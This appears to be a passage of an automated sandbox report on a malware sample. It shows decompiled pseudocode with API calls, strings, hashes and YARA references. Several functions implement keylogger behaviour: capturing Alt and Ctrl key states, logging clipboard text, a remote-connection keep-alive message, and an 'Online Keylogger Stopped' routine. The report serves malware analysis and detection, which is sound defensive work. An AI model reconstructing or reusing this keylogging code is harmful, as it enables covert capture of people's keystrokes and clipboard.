					if(_t30 == 0) {
						L7:
						_t26 = _t17;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t36 = 0x45b020;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t36) {
								break;
							}
							if(_t31 == 0) {
								L17:
								_t48 = _t17;
								if(_t17 != 0) {
									_t16 = E004374BA(_t23, _t23);
									goto L25;
								}
								if(E00443640(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t16 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t36 = _t36 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t17 = _t17 | 0x00000001;
						__eflags = _t17;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t34 = _t34 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				__eflags = _t26;
				goto L9;
			}


















                                                                                                0x0044b00c
                                                                                                0x0044b00d
                                                                                                0x0044b010
                                                                                                0x0044b014
                                                                                                0x0044b0ba
                                                                                                0x0044b0ce
                                                                                                0x0044b0d3
                                                                                                0x0044b0d5
                                                                                                0x0044b0db
                                                                                                0x0044b0de
                                                                                                0x0044b0e0
                                                                                                0x0044b0e2
                                                                                                0x0044b0e2
                                                                                                0x0044b0e8
                                                                                                0x0044b0ed
                                                                                                0x0044b0ed
                                                                                                0x0044b0d7
                                                                                                0x0044b0d7
                                                                                                0x00000000
                                                                                                0x0044b0d7
                                                                                                0x0044b01a
                                                                                                0x0044b01f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b025
                                                                                                0x0044b02a
                                                                                                0x0044b02c
                                                                                                0x0044b02c
                                                                                                0x0044b032
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b037
                                                                                                0x0044b04e
                                                                                                0x0044b04e
                                                                                                0x0044b057
                                                                                                0x0044b059
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b05b
                                                                                                0x0044b060
                                                                                                0x0044b062
                                                                                                0x0044b062
                                                                                                0x0044b068
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b06d
                                                                                                0x0044b08b
                                                                                                0x0044b08b
                                                                                                0x0044b08d
                                                                                                0x0044b0b2
                                                                                                0x00000000
                                                                                                0x0044b0b7
                                                                                                0x0044b0aa
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b0ac
                                                                                                0x00000000
                                                                                                0x0044b0ac
                                                                                                0x0044b06f
                                                                                                0x0044b077
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b079
                                                                                                0x0044b07c
                                                                                                0x0044b082
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b084
                                                                                                0x0044b086
                                                                                                0x0044b088
                                                                                                0x0044b088
                                                                                                0x00000000
                                                                                                0x0044b088
                                                                                                0x0044b039
                                                                                                0x0044b041
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b043
                                                                                                0x0044b046
                                                                                                0x0044b04c
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0044b04c
                                                                                                0x0044b052
                                                                                                0x0044b054
                                                                                                0x0044b054
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044B262,?,00000050,?,?,?,?,?), ref: 0044B0E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 87287e4518d651e2b0692e996bcadc958b29164629db7d0fe50fe0b99ec47450
                                                                                                • Instruction ID: f74176b6a3b1e7380533c4131977c56ace04f99782b8ad3301722c812ef79dfb
                                                                                                • Opcode Fuzzy Hash: 87287e4518d651e2b0692e996bcadc958b29164629db7d0fe50fe0b99ec47450
                                                                                                • Instruction Fuzzy Hash: DD21D362A00200A6FB348E548D01BA7729AEF64B53F568426E929D7300FB3BDE41C3DC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409C4A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E00409C4A(void* __ecx) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				void* __ebx;
				void* __esi;
				void* _t23;
				void* _t27;
				void* _t30;
				void* _t78;
				void* _t84;
				void* _t85;

				_t85 = _t84 - 0x94;
				_t78 = __ecx;
				if( *0x46feb4 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
					E0042FE69(0x46feb4);
					_t88 =  *0x46feb4 - 0xffffffff;
					if( *0x46feb4 == 0xffffffff) {
						E00401F5F(0x46feb8, 0x46feb8);
						E004301F3(_t88, E0045398B);
						E0042FE2A(0x46feb4, 0x46feb4);
					}
				}
				E00409C0E( &_v28);
				_t23 = E00409EE1(0x46feb8);
				_t89 = _t23;
				if(_t23 == 0) {
					E00409E07(0x46feb8,  &_v28);
					_t27 = E00407647(_t89);
					_t90 = _t27;
					if(_t27 != 0) {
						E00402076(0x46feb8,  &_v76, "\r\n[End of clipboard]\r\n");
						E00402076(0x46feb8,  &_v52, "\r\n[Text copied to clipboard]\r\n");
						_t30 = E00417CCA( &_v148,  &_v76);
						E00403022(_t85 - 0x18, E0040440A(0x46feb8,  &_v100, E00417CCA( &_v124,  &_v52), _t90, 0x46feb8), _t30);
						E00408BB6(_t78);
						E00401EE2();
						E00401EE2();
						E00401EE2();
						E00401FB9();
						E00401FB9();
					}
				}
				return E00401EE2();
			}

















                                                                                                0x00409c53
                                                                                                0x00409c68
                                                                                                0x00409c70
                                                                                                0x00409c78
                                                                                                0x00409c7d
                                                                                                0x00409c85
                                                                                                0x00409c89
                                                                                                0x00409c93
                                                                                                0x00409c99
                                                                                                0x00409c9f
                                                                                                0x00409c85
                                                                                                0x00409ca4
                                                                                                0x00409cae
                                                                                                0x00409cb3
                                                                                                0x00409cb5
                                                                                                0x00409cc1
                                                                                                0x00409cce
                                                                                                0x00409cd3
                                                                                                0x00409cd5
                                                                                                0x00409ce3
                                                                                                0x00409cf0
                                                                                                0x00409cfe
                                                                                                0x00409d24
                                                                                                0x00409d2c
                                                                                                0x00409d34
                                                                                                0x00409d3c
                                                                                                0x00409d47
                                                                                                0x00409d4f
                                                                                                0x00409d57
                                                                                                0x00409d57
                                                                                                0x00409cd5
                                                                                                0x00409d6a

                                                                                                APIs
                                                                                                  • Part of subcall function 004301F3: __onexit.LIBCMT ref: 004301F9
                                                                                                • __Init_thread_footer.LIBCMT ref: 00409C99
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                • API String ID: 1881088180-3686566968
                                                                                                • Opcode ID: 0bc439145bbc196802ef95a3f700bd743084bf2a86e91d41fd63f47b07f7d18e
                                                                                                • Instruction ID: 1364c38e3fb09b917a9efb015deb553e8459f1fb6bf5114896498835f5bcd246
                                                                                                • Opcode Fuzzy Hash: 0bc439145bbc196802ef95a3f700bd743084bf2a86e91d41fd63f47b07f7d18e
                                                                                                • Instruction Fuzzy Hash: 1B21B1319102094ACB04FBA5D8929EEB779AF40308F50053FE502772E3EF796E4A868D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 004050DB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 85%
                                                                                                			E004050DB(void* __edi, intOrPtr _a4) {
				struct _SYSTEMTIME _v24;
				char _v48;
				void* __ebx;
				void* _t11;
				void* _t17;
				intOrPtr _t36;
				void* _t37;
				void* _t41;
				void* _t42;
				void* _t46;

				_t35 = __edi;
				if( *0x46e8a4 == 0) {
					__eflags = 0;
					return 0;
				}
				_t36 = _a4;
				if( *0x46daf7 == 0) {
					L7:
					 *0x46e8c0 =  *0x46e8c0 & 0x00000000;
					 *0x46e8c5 = 1;
					 *0x46e8bc = _t36;
					return 1;
				}
				_t45 =  *0x46e8c4;
				_t22 = "Connection KeepAlive  | Enabled | Timeout: ";
				if( *0x46e8c4 != 0) {
					GetLocalTime( &_v24);
					_t17 = E00417C16("Connection KeepAlive  | Enabled | Timeout: ",  &_v48, _t36);
					_t41 = _t37 - 0x18;
					E004053F2("Connection KeepAlive  | Enabled | Timeout: ", _t41, _t22, __edi, _t45, _t17);
					_t42 = _t41 - 0x14;
					E00402076(_t22, _t42, "i");
					E00417670(_t22, __edi);
					_t37 = _t42 + 0x30;
					E00401FB9();
					 *0x46e8c4 = 0;
				}
				_t46 =  *0x46e8bc - _t36; // 0x0
				if(_t46 != 0) {
					_t47 =  *0x46e8c5;
					if( *0x46e8c5 != 0) {
						GetLocalTime( &_v24);
						_t11 = E00417C16(_t22,  &_v48, _t36);
						_t38 = _t37 - 0x18;
						E004053F2(_t22, _t37 - 0x18, _t22, _t35, _t47, _t11);
						E00402076(_t22, _t38 - 0x14, "i");
						E00417670(_t22, _t35);
						E00401FB9();
					}
				}
				goto L7;
			}













                                                                                                0x004050db
                                                                                                0x004050ea
                                                                                                0x004051be
                                                                                                0x00000000
                                                                                                0x004051be
                                                                                                0x004050f7
                                                                                                0x004050fa
                                                                                                0x004051a6
                                                                                                0x004051a6
                                                                                                0x004051af
                                                                                                0x004051b6
                                                                                                0x00000000
                                                                                                0x004051b6
                                                                                                0x00405100
                                                                                                0x00405107
                                                                                                0x0040510c
                                                                                                0x00405112
                                                                                                0x0040511d
                                                                                                0x00405122
                                                                                                0x0040512a
                                                                                                0x0040512f
                                                                                                0x00405139
                                                                                                0x0040513e
                                                                                                0x00405143
                                                                                                0x00405149
                                                                                                0x0040514e
                                                                                                0x0040514e
                                                                                                0x00405155
                                                                                                0x0040515b
                                                                                                0x0040515d
                                                                                                0x00405164
                                                                                                0x0040516a
                                                                                                0x00405175
                                                                                                0x0040517a
                                                                                                0x00405182
                                                                                                0x00405191
                                                                                                0x00405196
                                                                                                0x004051a1
                                                                                                0x004051a1
                                                                                                0x00405164
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00405112
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0040516A
                                                                                                Strings
                                                                                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 00405107
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-507513762
                                                                                                • Opcode ID: 44f1f37d1c060b31f0f26a5d337864351b3c0505452c20456e0832844f4a9e15
                                                                                                • Instruction ID: 2602b2401c21fbe244c57813349b61b37179f2c2b79d1ba746838369b61c9f1a
                                                                                                • Opcode Fuzzy Hash: 44f1f37d1c060b31f0f26a5d337864351b3c0505452c20456e0832844f4a9e15
                                                                                                • Instruction Fuzzy Hash: A721C8B5D0424097DB00B7BBD80AB9B77B8AB41344F44407AE841672D3EAB94548CBAB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00417670, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 73%
                                                                                                			E00417670(void* __ebx, void* __edi, char _a4, char _a28) {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				signed short _v102;
				signed short _v104;
				signed short _v106;
				signed short _v108;
				signed int _t57;
				struct _SYSTEMTIME* _t59;

				_t59 = (_t57 & 0xfffffff8) - 0x70;
				_t61 =  *0x46daf7;
				if( *0x46daf7 != 0) {
					GetLocalTime(_t59);
					_push(_v102 & 0x0000ffff);
					_push(_v104 & 0x0000ffff);
					_push(_v106 & 0x0000ffff);
					E00417604(_t61, E00401F87(E004076BB(__ebx,  &_v100, E00402F85(__ebx,  &_v76, E004076BB(__ebx,  &_v52, E00405416( &_v28, "%02i:%02i:%02i:%03i ", _t61,  &_a4), __edi, _t61, " | "), _t61,  &_a28), __edi, _t61, "\n")), _v108 & 0x0000ffff);
					E00401FB9();
					E00401FB9();
					E00401FB9();
					E00401FB9();
				}
				E00401FB9();
				return E00401FB9();
			}













                                                                                                0x00417676
                                                                                                0x00417679
                                                                                                0x00417680
                                                                                                0x0041768a
                                                                                                0x00417699
                                                                                                0x004176a4
                                                                                                0x004176aa
                                                                                                0x004176f5
                                                                                                0x00417701
                                                                                                0x0041770a
                                                                                                0x00417713
                                                                                                0x0041771c
                                                                                                0x0041771c
                                                                                                0x00417724
                                                                                                0x00417734

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 40ccf8ef75912a95e96b88de4639ce54bbdb0d7273123500cc2e1884c94a5c38
                                                                                                • Instruction ID: da86c98f0a150929a3279e689b1bccf6a35a519cae3d82787e6b7c352cbcb400
                                                                                                • Opcode Fuzzy Hash: 40ccf8ef75912a95e96b88de4639ce54bbdb0d7273123500cc2e1884c94a5c38
                                                                                                • Instruction Fuzzy Hash: D7117FB15082015AC304FBA5D8459ABB3E8AA84709F100A3FF995921E1EF78E948C65A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0043A314, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 95%
                                                                                                			E0043A314(signed int __eax, char _a4) {
				char _v8;
				void* __ecx;
				char _t17;
				void* _t19;
				void* _t24;
				void* _t26;
				void* _t33;
				signed int _t36;
				intOrPtr _t37;

				_push(_t26);
				_t1 =  &_a4; // 0x46e268
				_t36 =  *_t1;
				_t33 = _t26;
				if(((__eax | 0xffffffff) / _t36 & 0xfffffffe) >= 2) {
					_t24 = 0;
					_t37 = _t36 + _t36;
					if( *((intOrPtr*)(_t33 + 0x404)) != 0 || _t37 > 0x400) {
						if(_t37 >  *((intOrPtr*)(_t33 + 0x400))) {
							_t17 = E00440C6C(_t26, _t37);
							_v8 = _t17;
							if(_t17 != 0) {
								_t9 =  &_v8; // 0x46e268
								E0043A75C(_t33 + 0x404, _t9);
								_t11 =  &_v8; // 0x46e268
								_t17 =  *_t11;
								_t24 = 1;
								 *((intOrPtr*)(_t33 + 0x400)) = _t37;
							}
							E004414D5(_t17);
							_t19 = _t24;
						} else {
							goto L5;
						}
					} else {
						L5:
						_t19 = 1;
					}
				} else {
					 *((intOrPtr*)(E00438932())) = 0xc;
					_t19 = 0;
				}
				return _t19;
			}












                                                                                                0x0043a319
                                                                                                0x0043a320
                                                                                                0x0043a320
                                                                                                0x0043a329
                                                                                                0x0043a32e
                                                                                                0x0043a340
                                                                                                0x0043a342
                                                                                                0x0043a34a
                                                                                                0x0043a35a
                                                                                                0x0043a361
                                                                                                0x0043a366
                                                                                                0x0043a36c
                                                                                                0x0043a36e
                                                                                                0x0043a378
                                                                                                0x0043a37d
                                                                                                0x0043a37d
                                                                                                0x0043a380
                                                                                                0x0043a382
                                                                                                0x0043a382
                                                                                                0x0043a389
                                                                                                0x0043a38f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043a35c
                                                                                                0x0043a35c
                                                                                                0x0043a35c
                                                                                                0x0043a35c
                                                                                                0x0043a330
                                                                                                0x0043a335
                                                                                                0x0043a33b
                                                                                                0x0043a33b
                                                                                                0x0043a397

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: hF$hFhF
                                                                                                • API String ID: 0-512729024
                                                                                                • Opcode ID: 66db6e9f2f91d930929337a7f6c01fa3e34e12f64a2525744c7eed7bf9c08d5d
                                                                                                • Instruction ID: 444e78fc88a78de49f6eaca8830c099144722b02f6a1bfcd3633db9244d27423
                                                                                                • Opcode Fuzzy Hash: 66db6e9f2f91d930929337a7f6c01fa3e34e12f64a2525744c7eed7bf9c08d5d
                                                                                                • Instruction Fuzzy Hash: B9014072541114E6DB24DA6588415DFF36CEB45330F14531BEE6457140CB3C5C1686DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409535, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 82%
                                                                                                			E00409535(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t28 = "Online Keylogger Stopped";
				E00402076(__ebx,  &_v28, "Online Keylogger Stopped");
				_t31 = _t30 - 0x18;
				E00417CCA(_t31,  &_v28);
				E0040964B(__ebx, _t29, _t35);
				E00401FB9();
				_t32 = _t31 - 0x18;
				E00402076(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
				E00402076(_t19, _t32 - 0x18, "i");
				E00417670(_t19, _t28);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}








                                                                                                0x00409535
                                                                                                0x0040953c
                                                                                                0x0040953f
                                                                                                0x00409543
                                                                                                0x004095b8
                                                                                                0x00000000
                                                                                                0x004095b8
                                                                                                0x00409545
                                                                                                0x0040954e
                                                                                                0x00409553
                                                                                                0x0040955b
                                                                                                0x00409562
                                                                                                0x0040956a
                                                                                                0x0040956f
                                                                                                0x00409575
                                                                                                0x00409584
                                                                                                0x00409589
                                                                                                0x00409591
                                                                                                0x00409598
                                                                                                0x004095a2
                                                                                                0x004095ab
                                                                                                0x004095b1
                                                                                                0x004095b1
                                                                                                0x00000000

                                                                                                APIs
                                                                                                  • Part of subcall function 0040964B: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 0040964B: wsprintfW.USER32 ref: 004096DA
                                                                                                  • Part of subcall function 0040964B: SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • CloseHandle.KERNEL32(?), ref: 00409598
                                                                                                • UnhookWindowsHookEx.USER32 ref: 004095AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 3650414481-1496645233
                                                                                                • Opcode ID: 92d3fecff6e1796fa177225fae55c0ec1a1a37cc43c5d8ebea1db57b8a37f226
                                                                                                • Instruction ID: 0e82ee7cf6605d8404887f51bf32956e0f1aba4ff1f64d52b3fed64a74b7abab
                                                                                                • Opcode Fuzzy Hash: 92d3fecff6e1796fa177225fae55c0ec1a1a37cc43c5d8ebea1db57b8a37f226
                                                                                                • Instruction Fuzzy Hash: 0301DD31A04700ABD7217B69CC0B7BE7BB55B42315F40046FE541226D3EBB95855C7DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409B46, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 49%
                                                                                                			E00409B46(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				void* _t10;
				signed int _t12;
				void* _t13;
				void* _t17;
				void* _t18;

				_t10 = __ebx;
				_t17 = __ecx;
				_t12 = GetKeyState(0x11) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t17 + 0x4c)) - 0xa4;
				if(_t4 == 0) {
					_t13 = _t18 - 0x18;
					_push("[AltL]");
					L6:
					E00402076(_t10, _t13);
					return E00408B8F(_t17);
				}
				_t7 = _t4 - 1;
				if(_t7 == 0) {
					if(_t12 == 0) {
						_t13 = _t18 - 0x18;
						_push("[AltR]");
						goto L6;
					}
					return _t7;
				} else {
					E004089F0(_t17, _t18 - 0x18);
					return E00408BB6(_t17);
				}
			}










                                                                                                0x00409b46
                                                                                                0x00409b49
                                                                                                0x00409b51
                                                                                                0x00409b57
                                                                                                0x00409b5c
                                                                                                0x00409b8b
                                                                                                0x00409b8d
                                                                                                0x00409b92
                                                                                                0x00409b92
                                                                                                0x00000000
                                                                                                0x00409b99
                                                                                                0x00409b5e
                                                                                                0x00409b61
                                                                                                0x00409b7a
                                                                                                0x00409b7f
                                                                                                0x00409b81
                                                                                                0x00000000
                                                                                                0x00409b81
                                                                                                0x00409b9f
                                                                                                0x00409b63
                                                                                                0x00409b69
                                                                                                0x00409b76
                                                                                                0x00409b76

                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000011), ref: 00409B4B
                                                                                                  • Part of subcall function 004089F0: GetForegroundWindow.USER32(00000000,?,00000000), ref: 00408A24
                                                                                                  • Part of subcall function 004089F0: GetWindowThreadProcessId.USER32(00000000,?), ref: 00408A2F
                                                                                                  • Part of subcall function 004089F0: GetKeyboardLayout.USER32(00000000), ref: 00408A36
                                                                                                  • Part of subcall function 004089F0: GetKeyState.USER32(00000010), ref: 00408A40
                                                                                                  • Part of subcall function 004089F0: GetKeyboardState.USER32(?), ref: 00408A4D
                                                                                                  • Part of subcall function 004089F0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00408A69
                                                                                                  • Part of subcall function 00408BB6: SetEvent.KERNEL32(?,?,?,?,00409D31,?,?,?,?,?,00000000), ref: 00408BE3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State$KeyboardWindow$EventForegroundLayoutProcessThreadUnicode
                                                                                                • String ID: [AltL]$[AltR]
                                                                                                • API String ID: 3195419117-2658077756
                                                                                                • Opcode ID: 7fb86763c8965303acac0c6c88074a22fbb9044f5b3fbad6b20c6615acd11912
                                                                                                • Instruction ID: e35176dbbfa8f5bc1daf44fcd8486748193378876bcd187eaedcbc47aeca39be
                                                                                                • Opcode Fuzzy Hash: 7fb86763c8965303acac0c6c88074a22fbb9044f5b3fbad6b20c6615acd11912
                                                                                                • Instruction Fuzzy Hash: E8E0302170061017C868353E7A1A9BE3920A782774B80026FF8866B6D7DDBE9D5542CF
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00409BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 43%
                                                                                                			E00409BA0(void* __ebx, void* __ecx) {
				void* _t4;
				void* _t7;
				signed int _t9;
				void* _t10;
				void* _t12;
				void* _t13;

				_t7 = __ebx;
				_t12 = __ecx;
				_t9 = GetKeyState(0x12) & 0x0000ffff;
				_t4 =  *((intOrPtr*)(_t12 + 0x4c)) - 0xa2;
				if(_t4 == 0) {
					if(_t9 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlL]");
						goto L5;
					}
				} else {
					_t4 = _t4 - 1;
					if(_t4 == 0) {
						_t10 = _t13 - 0x18;
						_push("[CtrlR]");
						L5:
						E00402076(_t7, _t10);
						return E00408B8F(_t12);
					}
				}
				return _t4;
			}









                                                                                                0x00409ba0
                                                                                                0x00409ba3
                                                                                                0x00409bab
                                                                                                0x00409bb1
                                                                                                0x00409bb6
                                                                                                0x00409bcc
                                                                                                0x00409bd1
                                                                                                0x00409bd3
                                                                                                0x00000000
                                                                                                0x00409bd3
                                                                                                0x00409bb8
                                                                                                0x00409bb8
                                                                                                0x00409bbb
                                                                                                0x00409bc0
                                                                                                0x00409bc2
                                                                                                0x00409bd8
                                                                                                0x00409bd8
                                                                                                0x00000000
                                                                                                0x00409bdf
                                                                                                0x00409bbb
                                                                                                0x00409be5

                                                                                                APIs
                                                                                                • GetKeyState.USER32(00000012), ref: 00409BA5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: State
                                                                                                • String ID: [CtrlL]$[CtrlR]
                                                                                                • API String ID: 1649606143-2446555240
                                                                                                • Opcode ID: 024402f1b56cbc158735a38b23a796f1d21e163818380e0afd684ee8f65d9051
                                                                                                • Instruction ID: 2611ddd4a484906f269b747b72a753b2ea3c58a2ac4d4ae1f4d928546668cd4a
                                                                                                • Opcode Fuzzy Hash: 024402f1b56cbc158735a38b23a796f1d21e163818380e0afd684ee8f65d9051
                                                                                                • Instruction Fuzzy Hash: A0E04F2170031117C928353E7A5A67A3935A7417B5B80026FF882AB6D7ED6E9D10538E
                                                                                                Uniqueness

